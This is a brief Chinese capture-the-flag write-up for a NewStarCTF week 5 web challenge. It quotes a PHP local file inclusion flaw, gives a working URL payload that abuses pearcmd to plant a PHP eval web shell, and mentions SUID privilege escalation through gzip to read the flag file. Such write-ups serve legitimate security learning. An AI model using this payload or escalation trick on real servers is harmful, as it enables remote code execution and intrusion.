NewStarCTF WEEK5|WEB 4-复盘

打开题目

研究一圈没啥营养价值

下载源码

发现好东西

        if (file_exists($page)) {
          require_once $page; 
        }else{
          require_once 'pages/error_page.php';
        }

活的文件包含
我们直接利用

?+config-create+/&page=../../../../../usr/local/lib/php/pearcmd&/<?=@eval($_POST[a]);?>+shell.php

这个方法来源

我这里蚁剑没连上
不知道是什么原因
连上后flag权限不够
可以提权SUID提权

还有个漏洞可以用gzip

gzip -f /flag -t